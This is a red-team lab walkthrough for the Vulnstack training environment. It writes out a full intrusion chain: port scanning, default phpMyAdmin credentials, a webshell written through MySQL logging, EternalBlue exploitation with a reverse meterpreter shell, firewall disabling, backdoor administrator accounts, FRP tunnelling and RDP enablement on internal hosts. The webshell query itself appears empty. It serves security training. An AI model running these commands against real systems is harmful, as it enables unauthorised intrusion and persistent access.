Lab URL: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
This comprehensive red team training series provides a realistic enterprise environment for security practitioners. The lab simulates a complete ATT&CK attack chain, offering hands-on experience through practical exercises. All virtual machines in this enviroment use the same credentials: hongrisec@2019
Training Objectives
The curriculum covers the complete kill chain:
- Environment Setup and Information Gathering
- Vulnerability Discovery and Exploitation
- Internal Network Reconnaissance
- Lateral Movement Techniques
- Tunnel Construction
- Persistent Access Maintenance
- Operational Security and Log Cleanup
Environment Setup
Initial Configuration
Download the target virtual machines and open the configuration files by double-clicking the .vmx files. Configure network adapters for Win7 and connect all target machines to the appropriate networks.
Network Topology
The Win7 machine serves as the primary attack surface with dual network interfaces, providing access to both the external network and internal infrastructure.
External Reconnaissance
Port Scanning
Begin with comprehensive port enumeration using nmap to identify exposed services:
nmap -sS -v 192.168.1.12 --min-hostgroup 254 --min-rate 1000
<p><strong>Parameters explained:</strong></p>
-sS: Stealth SYN scan (half-open connection)--min-hostgroup 254: Process multiple hosts in parallel batches--min-rate 1000: Send packets at minimum rate of 1000 per second
Discovered open ports: 80 (HTTP), 445 (SMB), 3306 (MySQL)
Web Application Analysis
Accessing port 80 reveals a phpStudy探针 (探针 means probe/diagnostic page), leaking server information and web root path.
Directory Enumeration
dirb http://192.168.1.12
<p>Directory scanning identifies the administrative interface and additional paths for further investigation.</p>
<h1>Vulnerability Exploitation</h1>
<h2>Database Access</h2>
<p>Testing default phpmyadmin credentials (root/root) successfully authenticates to the database management interface.</p>
<h2>File Write Capabilities Assessment</h2>
<p>Check MySQL's file write permistions:</p>
<code>SHOW GLOBAL VARIABLES LIKE '%secure%';
</code>
<p>Possible values:</p>
- NULL: Cannot read or write arbitrary files
- Path specified: Only files within that directory are accessible
- Empty: Can read any file accessible to the MySQL user
If the value is NULL, modification requires updating the MySQL configuration file.
Webshell Deployment via Database Logging
When direct file write is restricted, leverage MySQL's logging functionality:
-- Verify logging status SHOW GLOBAL VARIABLES LIKE '%general%';
-- Enable logging SET GLOBAL general_log = 'ON';
-- Configure log path to web-accessible directory SET GLOBAL general_log_file = 'C:/phpStudy/WWW/malware.php';
-- Write web shell command SELECT '';
<p>Once the query executes, the web shell is written to the log file. Connect using tools like AntSword, Behinder, or China Chopper.</p>
<h2>Alternative: Application Backdoor</h2>
<p>Directory scanning also reveals a compressed archive and CMS directory. After gaining administrative access to the CMS, create a new template file containing the web shell payload. Locate the file upload endpoint and execute the backdoor through the web interface.</p>
<h1>System Hardening Bypass</h1>
<h2>Disabling Firewall</h2>
<code>-- Check firewall status
netsh advfirewall show allprofile state
-- Disable all firewall profiles
netsh advfirewall set allprofiles state off
</code>
<h2>Enabling Remote Desktop</h2>
<code>-- RDP through registry
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
</code>
<h1>Initial Access - Exploiting MS17-010</h1>
<p>The Win7 machine contains the EternalBlue vulnerability (CVE-2017-0144). Use Metasploit for exploitation:</p>
<code>use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.12
set LHOST 192.168.1.11
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
</code>
<h2>Post-Exploitation: RDP Access</h2>
<code>run post/windows/manage/enable_rdp
</code>
<h2>Local Privilege Escalation and Persistence</h2>
<code>-- Create new local administrator account
net user attacker P@ssw0rd123! /add
net localgroup administrators attacker /add
-- Verify current context
whoami
-- Network configuration enumeration
ipconfig /all
-- Comprehensive system information
systeminfo
</code>
<h1>C2 Framework Deployment</h1>
<p>Generate a payload using Cobalt Strike or similar framework, upload through the existing web shell, and execute in a command shell to establish the C2 beacon.</p>
<h1>Internal Network Enumeration</h1>
<p>After establishing the initial foothold, discover additional targets through internal scanning:</p>
<code>-- Host discovery on internal segment
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.52.%i | findstr "Reply"
</code>
<p>Target environment contains three additional machines on the internal network segment.</p>
<h1>Tunnel Construction</h1>
<h2>Deploying FRP for Proxy Access</h2>
<p>Upload FRP client binaries to the compromised host and configure the tunnel:</p>
<code>-- Server-side (attacker machine)
frps.exe -c frps.ini
-- Client-side (on compromised target via web shell)
frpc.exe -c frpc.ini
</code>
<h2>Configuring Proxy Chains</h2>
<p>Configure proxychains on the attacker's Kali Linux for traffic routing through the established tunnel:</p>
<code>proxychains msfconsole
</code>
<h1>Internal Network Exploitation</h1>
<h2>Scanning Internal Targets</h2>
<code>-- Load EternalBlue scanner module
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOST 192.168.52.141
exploit
</code>
<h2>Command Execution via MS17-010</h2>
<code>-- Load command execution module
use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.52.141
-- Execute commands through the vulnerability
set COMMAND whoami
-- Create local administrator account
set COMMAND net user intruser Admin@2019 /add
set COMMAND net localgroup administrators intruser /add
</code>
<h2>Remote Desktop Access via Command Module</h2>
<code>-- Query RDP status
set COMMAND reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
-- Enable RDP service
set COMMAND reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-- Verify RDP port configuration
set COMMAND reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
-- Disable network level authentication (compatibility)
set COMMAND reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
-- Firewall exception for RDP
set COMMAND netsh advfirewall firewall add rule name="Remote Desktop Access" dir=in action=allow protocol=TCP localport=3389
</code>
<p>With RDP enabled and authenticated access established, connect through the configured proxy tunnel using standard RDP clients.</p>